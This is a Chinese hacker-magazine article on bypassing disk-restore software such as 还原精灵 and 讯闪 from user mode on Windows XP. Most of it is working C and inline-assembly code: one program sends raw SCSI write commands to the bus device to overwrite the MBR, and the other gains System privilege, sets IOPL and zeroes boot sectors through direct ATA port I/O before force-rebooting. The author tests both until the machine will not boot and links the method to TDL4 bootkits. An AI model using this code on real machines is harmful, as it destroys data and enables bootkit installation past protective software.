Ring3下穿透磁盘还原技术的揭秘

前置知识:VC

关键词:磁盘还原,还原精灵,注册表

图/文 liuke_blue

在写这篇文章之前我犹豫了很久,到底要不要把这些鲜为人知的方法公开了,因为一旦公开,被人掌握这些技术,那么还原软件的脆弱性则一览无遗,网吧的机子应该就可以随便地穿透,机器狗是需要加载驱动来进行穿透还原,而我介绍的这种技术不需要加载驱动便可以穿透还原,你是不是听得有点兴奋,有点热血沸腾;但是我还是要告诉你,技术是一把双刃剑,利用得好是安全软件,利用得邪恶就是木马、病毒等;作为一名黑客防线的读者,我相信都是希望立志成为一名网络安全员,为中国互联网的安全纯洁尽一份绵薄之力。题外话就不说了,下面切入正题。

记得我最早接触的还原软件是还原精灵,是台湾地区一家软件公司出品的安全软件,它最大的神奇之处就在于计算机重启之后,你对计算机磁盘的所有操作:添加、删除、修改文件、注册表的这些痕迹全部被抹得一干二净,所有的操作都随着计算机重启而“消失了”。还有就是有一种硬件还原卡也起到相同的效果。当时在学校的机房里,想装点自己的东西,总是不行,因此我记得当时最流行的手段——过还原精灵就是破解其密码,破解密码后,重新修改还原精灵的配置,就可以使自己读/写磁盘有效,当时由于自己还不会内核驱动开发,也不知道还原软件的原理,只是觉得太不可思议了。现在由于自己开始学习内核编程,对还原软件的原理有一定的了解,还原软件主要解决数据读/写重定向问题以及重定向读/写的效率,目前的还原软件主要有两种:单点还原、多点还原。以后有时间我再给各位分享自己这方面的学习研究结果。自Windows 64位的操作系统开始,微软意识到其自身内核安全的问题,加入了PatchGuard技术,这个技术能够防止内核模式驱动动态或者替换Windows内核的任何内容;也就是说:SSDT HOOK、inline HOOK、IAT HOOK、EAT HOOK、IDT HOOK等,只要是修改了内核模块的任何部分,就会蓝屏。也就是Windows 64位操作系统在内核里封锁了HOOK技术(应用层下仍然可以使用),也就是我们以前学习的HOOK技术无用了,那不是白学习了,你先别急着愤怒,应该愤怒的是所有的安全软件公司,你想想现在几乎所有的安全软件都在内核中使用了HOOK技术,而且都是通过自己反汇编、底层调试等手段研究出来的,这些核心技术一声不响就被微软封杀,你说它恼不恼火,虽然微软也意识到这个问题,随后提供一些监控的接口,但是这又使所有安全软件的很多功能雷同了,难道微软想把安全这一块留给自己,这现实吗?x86的许多木马确实无法在x64的机器上运行,但是新的问题出现了:TDL4这类病毒完全绕过你的PatchGuard,它通过底层读/写将自己写在MBR里,也就是BOOTKIT技术,在你的PatchGuard还未启动时,写入ROOTKIT驱动,从而隐藏保护自身等。这样完全绕过了所谓的PatchGuard技术。说那这么多,跟Ring3穿透还原有什么的关系?其实我想说的就是TDL4将自身写入到MBR里,用到的就是穿透技术,如何将自身写入磁盘所保护的位置,这就是关键。由于自身技术和环境的限制,我还不能给大家介绍64位下的穿透,因此这次给大家介绍的是32位Windows XP系统下的穿透技术。

这些技术来源于MJ0011在XCON(国内最大的安全焦点会议)2008的一篇文章tophet.a,搞安全的没有几个人不认识MJ0011,此人目前就职于360,号称360首席技术工程师,其犀利的言论和深不可测的技术被我们小菜鸟所惊奇,特别是他时不时就爆出其他安全软件:瑞星、微点、金山等甚至微软的Exploit并且在各大安全论坛内不停地指点和抨击。我常常在想每个人每天只有24个小时,为什么他能完成这么多事,我却不行,难道不吃不喝还是可以制造出大量的“影分身”。开个玩笑,从技术上来说他确实相当厉害,而其他就无需多言了,不过中国的互联网本身就是混沌的情况,3Q还能大战,一切皆有可能。

首先介绍如何在Ring3下通过构造SCSI指令来穿透还原软件。还原软件的核心技术就是数据读/写重定向和重定向后的数据读/写效率的问题,还原软件的驱动一般是磁盘类设备过滤驱动和卷设备过滤驱动。卷设备驱动、磁盘类设备驱动、总线设备驱动,是从上至下的顺序的排列的设备堆栈,最底层是总线设备(也就为端口驱动设备),这个从上至下的并不是理论上的垂直,我这样解释只是方便我们理解,下面是装有还原软件-讯闪(很多网吧用这个)的设备堆栈示意,如图1所示。

图1

这里sndisk+0x128d是调用线程读/写队列函数的后一条指令,而sndisk+0x744c是线程读/写队列函数体里面执行IoCallDriver函数的后一条指令,还原过滤驱动先于磁盘类设备驱动或者卷驱动对IPR进行处理,通过获取的IRP取得读/写指令、读/写数据的位置、长度、读/写数据内容等,然后通过一系列复杂的处理(比如:计算读/写的重定向的磁盘簇的位置),重新封装好刚刚处理的IRP,然后把它通过IoCallDriver转发下去,不管是单点还是多点磁盘还原软件都是用这种方式,不同的是如何计算重定向的位置,不影响读/写效率等。以后我会将自己的学习研究成果与大家一起分享的。我们观察图1,发现因为构造的SCSI指令直接发送总线设备,这就绕过了还原过滤驱动以及一些读/写函数HOOK的拦截,这就是穿透还原的真正原理。开始编写代码之前,必须解决两个核心问题:1、如何得到总线设备的符号连接,因为应用程序是通过符号连接来访为驱动设备的,这里我们采取WinObj软件的方式,如图2所示,并且使用 CreateFile函数打开设备;2、如何封装SCSI指令,该指令的核心就是CDB命令描述块的结构,使用DeviceControl函数来发送SCSI指令。

图2

其核心的代码如下:

ULONG GetFuncAddressFromNtdll()
{
  HMODULE hModule;
  hModule=GetModuleHandleA("ntdll.dll");
  NtOpenDirectoryObject = (NTOPENDIRECTORYOBJECT)
GetProcAddress(hModule,"NtOpenDirectoryObject");
  if (!NtOpenDirectoryObject)
    return 0;
  hModule=GetModuleHandleA("ntdll.dll");
  NtQueryDirectoryObject =
(NTQUERYDIRECTORYOBJECT) GetProcAddress(hModule,"NtQueryDirectoryObject");
  if (!NtQueryDirectoryObject)
    return 0;
  hModule=GetModuleHandleA("ntdll.dll");
  NtOpenSymbolicLinkObject =
(NTOPENDIRECTORYOBJECT)
GetProcAddress(hModule,"NtOpenSymbolicLinkObject");
  if (!NtOpenSymbolicLinkObject)
    return 0;
  hModule=GetModuleHandleA("ntdll.dll");
  NtQuerySymbolicLinkObject =
(NTQUERYSYMBOLICLIN
KOBJECT)GetProcAddress(hModule,"NtQuerySymbolicLink
Object");
  if (!NtQuerySymbolicLinkObject)
    return 0;
  return 1;
  }
  //得到物理磁盘对应的总线设备的符号链接,也就是对应的微端口驱动
  ULONG QueryDR0SymbollinckName(IN PWSTR
DeviceName)
  {
    HANDLE Openhandle;
    NTSTATUS status;
    ULONG result;
    result=0;
    /* L"DosDevices"对应的符号连接"\\??"-->来自Winobj
逆向
       L"\\SystemRoot"对应的符号连接
"\\Device\\Harddisk0\\ Partition1\\Windows"
  */
  //判定是否找到是物理磁盘对应的总线设备的符号链
接,这里用"IDE#Disk"来判定
    if (!wcsstr(DeviceName,L"IDE#Disk"))
      return 0;
  else
    {
    result=1;
    }
    return result;
  }
  ULONG GetBusDeviceName()
  {
    NTSTATUS status;
    UNICODE_STRING ObjectName;
    OBJECT_ATTRIBUTES oa ;
    HANDLE OpenObject;
    ULONG BufferLength=0x800;
    PCHAR Buffer;
    ULONG uContext;
    ULONG uResult;
    ULONG ncount=0;
    PDIRECTORY_BASIC_INFORMATION pDirObjectinfo
= NULL;
    WCHAR ObjName[0x100]={0};
    ULONG Result;
    Result=0;
INIT_UNICODE_STRING(ObjectName,L"\\GLOBAL??");
  InitializeObjectAttributes(&oa,&ObjectName,
OBJ_CASE_ INSENSITIVE, NULL, NULL);
  status =
(NtOpenDirectoryObject)(&OpenObject,DIRECTORY_
QUERY,&oa);
  if (!NT_SUCCESS(status))
   return Result;
   do
   {
  BufferLength*=2;
      Buffer = (PCHAR)malloc(BufferLength);
      memset(Buffer,0,BufferLength);
      status =
  (NtQueryDirectoryObject)(OpenObject,Buffer,
BufferLength,FALSE, TRUE, &uContext, &uResult);
  }while(status == STATUS_MORE_ENTRIES || status
 == STATUS_BUFFER_TOO_SMALL);
   if (NT_SUCCESS(status))
   {
  pDirObjectinfo =
(PDIRECTORY_BASIC_INFORMATION )Buffer;
  //这里取第一个objectname
  while(pDirObjectinfo->ObjectName.Length!=0 &&
pDirObjectinfo-> ObjectTypeName.Length!=0)
  {
wcscpy(ObjName,pDirObjectinfo->ObjectName.Buffer);
     if (QueryDR0SymbollinckName(ObjName)==1)
      {
        Result =1;
         wcscpy(BusDevSymbolicName,L"\\\\.\\");
         wcscat(BusDevSymbolicName,ObjName);
        OutputDebugStringW(BusDevSymbolicName);
         break;
      }
      pDirObjectinfo++;
      ncount++;
      memset(ObjName,0,0x100);
    }
  }
  if (Buffer)
   free(Buffer);
  return Result;
  }
  ULONG bypasswrite_disk(HANDLE hDev,PVOID
InDataBuf, ULONG LBA)
  {
    ULONG blockCount=1;
    SCSI_PASS_THROUGH_DIRECT_WITH_BUFFER
sptdwb;
    ULONG length=0,returnlength=0;
      ULONG result;
    result = 1;
    if (hDev==INVALID_HANDLE_VALUE)
    return result;
    ZeroMemory(&sptdwb,
sizeof(SCSI_PASS_THROUGH_DIRECT_WITH_BUFFER));
    sptdwb.sptd.Length = sizeof(SCSI_PASS_THROUGH_
DIRECT);
    sptdwb.sptd.PathId = 0;
    sptdwb.sptd.TargetId = 1;
  sptdwb.sptd.Lun = 0;
    sptdwb.sptd.CdbLength =
CDB12GENERIC_LENGTH;
    sptdwb.sptd.SenseInfoLength = sizeof(sptdwb.ucSenseBuf);
    sptdwb.sptd.DataIn =
SCSI IOCTL DATA OUT;
    sptdwb.sptd.DataTransferLength = blockCount
* 512;   //这里读写一个扇区
    sptdwb.sptd.TimeOutValue = 5000;
    sptdwb.sptd.DataBuffer = (VOID *)InDataBuf;
         //输入的buffer,空间为0x200
    sptdwb.sptd.SenseInfoOffset
  =
offsetof(SCSI_PASS_THROUGH_DIRECT_WITH_
BUFFER,ucSenseBuf);
    sptdwb.sptd.Cdb[0] = SCSIOP_WRITE;
    sptdwb.sptd.Cdb[1] = 0x00;
  sptdwb.sptd.Cdb[2] = (UCHAR)((LBA >> 24) &
0xFF);
    sptdwb.sptd.Cdb[3] = (UCHAR)((LBA >> 16) & 0xFF);
    sptdwb.sptd.Cdb[4] = (UCHAR)((LBA >> 8) & 0xFF);
    sptdwb.sptd.Cdb[5] = (UCHAR)((LBA >> 0) & 0xFF);
    sptdwb.sptd.Cdb[6] = 0x00;
    sptdwb.sptd.Cdb[7] = (UCHAR)((blockCount >> 8)
& 0xFF);
    sptdwb.sptd.Cdb[8] = (UCHAR)((blockCount >> 0)
& 0xFF);
    sptdwb.sptd.Cdb[9] = 0x00;
    length = sizeof(SCSI_PASS_THROUGH_DIRECT_
WITH_BUFFER);
result = DeviceIoControl(hDev,IOCTL_SCSI_PASS_
THROUGH_DIRECT,&sptdwb,length,&sptdwb,length,&return
length,FALSE);
    if (result!=0)
    {
       OutputDebugString("Passthough ok!");
      CloseHandle(hDev);
      result=0;
      return result;
    }
  CloseHandle(hDev);
  return result;
  }
  int main(int argc,char* argv[])
  {
    ULONG result;
    HANDLE hDevice;
    char buffer[100]={0};
    char outbuffer[200]={0};
    ULONG StartLBA;
    BYTE Inbuffer[0x200]={0};
    printf("ByPass Disk Revert for test....\n");
    if (argc!=3)
    {
        printf("Usage:Passthough <StartLBA(x)> <select
{YES or NO} >\n");
  }
  if (!stricmp((char *)argv[2],"YES"))
  {
    if (GetFuncAddressFromNtdll())
    {
  result=GetBusDeviceName();
      if (result)
      {
          //开始构造
IOCTL_SCSI_PASS_THROUGH_DIRECT指令来穿透还原
      hDevice =
CreateFileW(BusDevSymbolicName,GENERIC_
ALL,FILE_SHARE_READ|FILE_SHARE_READ,NULL,OPE
N_EXISTING,0,0);
       if (hDevice)
       {
          sprintf(buffer,"%s0x%x","获取总线设备符
号连接的设备句柄:",hDevice);
    OutputDebugString(buffer);
          //开始穿透还原测试
          StartLBA = (ULONG)(atoi(argv[1]));
          printf("StartLBA=%d\n",StartLBA);
          memset(Inbuffer,0x38,0x200);
          printf("Start ByPass Write!\n");
result=bypasswrite_disk(hDevice,Inbuffer,StartLBA);
          if (!result)
          {
             sprintf(outbuffer,"%s%d%s","穿透磁盘
成功,起始第<",StartLBA,">个扇区被写入数据,自行查看!");
             OutputDebugString(outbuffer);
             return 2;
          }
       }
    }
  }
  }
  return 0;
}

使用编写好的穿透还原的程序进行测试,环境:Windows XP SP3 + 讯闪还原软件,对MBR整个扇区的内容进行写入测试,效果如图3所示。

图3

计算机重启之后,MBR丢失,效果如图4所示:

图4

这里IOCTL_SCSI_PASS_THROUGH_DIRECT、IOCTL_SCSI_ PASS_THROUGH这两条指令差不多,区别是如果不调用IOCTL_SCSI_ PASS_THROUGH,那是因为基本的微端口。

驱动访问内存,调用的CDB命令描述块可能需要直接访问内存,使用IOCTL_SCSI_PASS_THROUGH_DIRECT来代替。我翻译得有点拗口,解释一下:就是如果CDB的命令描述块要求直接访问内存,那么就用IOCTL_ SCSI_PASS_THROUGH_ DIRECT而不是IOCTL_SCSI_ PASS_THROUGH。如果你还不能理解,请去找一些SCSI相关资料阅读一下,所以你用IOCTL_ SCSI_PASS_ THROUGH也可以,修改一下sptdwb.sptd. DataBuffer,因为IOCTL_SCSI_PASS_THROUGH是没有使用到buffer的指针。网上某人说:Mjoo11给出tophet.a文档中给出的部分代码没用,有好几个暗桩。拜托你自己再仔细看看SCSI的资料,因此MJOO11留言狠狠地挖苦了他,有兴趣的读者可以去网上搜一下《RING0和RING3穿透还原..》。还要说最重要的一句,使用者必须具有Adminstrator以上权限才可以使用SCSI写入权限。

接着我再介绍在Ring3下直接I/O的方式,也有几个条件:1、System权限;2、然后调用ZwSetInformationProcess给操作进程设置I/O操作的权限,也就是设置参数IOPL。如何让进程具有System权限,有几种方法:父进程具有System权限,那么创建子进程也会继承权限;父线程具有System权限,那么创建的子线程也可以继承该权限;添加 ACL 的方法;创建服务进程,自动就有System权限;HOOK ZwCreateProcessEx 函数等等。

我采用创建服务进程,然后在服务进程创建子进程,让其继承父进程的System权限即可,下面是直接读/写I/O来清零MBR的核心代码:

  OOL IsSystemLevel()
  {
    BOOL result=FALSE;
    OSVERSIONINFO osv;
    CHAR username[30]={0};
    DWORD cb=30;
    ZeroMemory(&osv,sizeof(osv));
    osv.dwOSVersionInfoSize=sizeof(osv);
    //判断操作系统是否为NT以上
    GetVersionExA(&osv);
    if (!(osv.dwPlatformId &VER_PLATFORM_WIN32_NT))
    {
      result = FALSE;
      return result;
    }
    //判断用户是否是Administrator
    GetUserNameA(username,&cb);
    OutputDebugStringA(username);
    if (stricmp(username,"system"))
    {
      result = FALSE;
      return result;
    }
  return 1;
  }
  //进程获取system的权限后,设置IOPL=TRUE,可以在
User MOde操作I/O端口
  BOOL EnableUserModeHardwareIO()
  {
    BOOL result=FALSE;
    DWORD dwProcessID=GetCurrentProcessId();
    HANDLE hProcess = OpenProcess(PROCESS_ALL_
ACCESS,FALSE,dwProcessID);
    HMODULE hNTDLL = GetModuleHandleA("ntdll.dll");
    DWORD ZwSetInformationProcess_Address;
    ULONG IOPL=1;
    if (hNTDLL)
    {
          ZwSetInformationProcess_Address = (DWORD)
GetProcAddress(hNTDLL,"ZwSetInformationProcess");
          if (ZwSetInformationProcess_Address)
          {
             result =IsSystemLevel();
          if (result)
             {
                 __asm{
                        pushad
                        push 4
                        lea eax,IOPL
                        push eax
                        push 16
                        push hProcess
                        call
ZwSetInformationProcess_Address
                        mov result,eax
                        popad
              }
          if (!result)
              result =TRUE;
      }
  }
  }
  CloseHandle(hProcess);
  return result;
  }
  //用I/O端口读写磁盘,将磁盘的前8个扇区清0
  int UsermodeByPass()
  {
       asm{
  write:
  mov   dx,1F6h //要写入的磁盘号及磁头号
            mov al,0x00
  out   dx,al
            mov dx,1F2h    //要写入的扇区数量
            mov al,1
            out dx,al
            mov dx,1F3h    //要写的扇区号
            mov al,1
            out dx,al
            mov dx,1F4h    //要写的柱面的低8位
            mov al,0
            out dx,al
            mov dx,1F5h    //柱面高2位
            mov al,0
            out dx,al
            mov dx,1F7h    //命令端口
            mov al,30h     //尝试写入扇区
            out dx,al
  inputs:
  in   al,dx
            test al,8
            jz short inputs
          xor ecx,ecx
          mov   cx, 100h
          mov   dx, 1F0h
          lea   esi,[inbuf]
           cli
           cld
           rep outsw
           sti
        }
  shutdownsys();
  return 0;
  }
  int shutdownsys()
  {
    _asm mov dx,0x64
     asm mov al,0xFE
    _asm out dx,al
    return 0;
}

使用ZwSetInformationProcess设置参数IOPL的值为TRUE时,进程就具有I/O操作权限,记得去年我写的黑防一篇文章<<内核编程读/写CMOS>>,黑防迷们不知道还有没有印象,里面就提到过CPL<=IOPL时,就可以读/写I/O,CPL代表内核模式为0,应用层模式为3;因此CPL=0<=IOPL一定成立。每个进程都有EPROCESS->KPROCESS,PCB里面的参数Iopl如果为TRUE,那么EFLAGS 寄存器中IOPL 值为3,即CPL=3<=IOPL,所以关键就在于使得条件CPL<=IOPL成立,那么就可以读/写I/O,所以在内核和应用层里读/写I/O其实是一样的,只是为了能够有读/写I/O权限,其他代码就不过多阐述了。如何读/写磁盘跟dos编程读/写一样,在寄存器里设置读/写位置、大小(扇区为单元),然后用out、in来操作,为了防止关机时,某些还原软件会通过关机回调函数来恢复MBR,因此直接I/O关机。环境:WinXP SP3+还原精灵7,如图5所示是效果示意图。

图5

重启后,MBR被清0,无法进入系统,效果跟前面使用SCSI指令穿透效果一样。不过这种方式已经被很多安全软件所监控到,权限提升,意图太明显,I/O读/写文件的通用性不好。

RING3下穿透还原的技术肯定不止这两种,核心技术就是想办法绕过还原过滤驱动,将读/写指令往更底层的驱动下发送,当然由于Windows操作系统的封闭性(不开源)、隐蔽性(内藏很多特性未公开)、脆弱性(程序漏洞)等等,很多黑客如果研究到了某一块,发现某些特性正好可以用来穿透还原,也未可知也;早先国内大牛猪头三就放出一个穿透bin,由于加了多层变态壳,我也没有分析出其穿透还原的原理,以后有机会或者有谁能研究出结果不妨也放在黑客防线上交流一下。另外,国外某些知名黑客论坛也有公布这方面的信息,老外的技术确实很强;还有一些病毒、木马的技术也来源于此,技术永远在日新月异地更新,这篇文章我确实写了很长时间,虽然代码早已写出,但是要将原理讲透彻、把复杂问题简单化有时确实很难,谢谢各位黑防读者,仓促之间本文难免有些不足之处,欢迎批评指正!

(编辑提醒:本文涉及的代码可以到黑防官方网站下载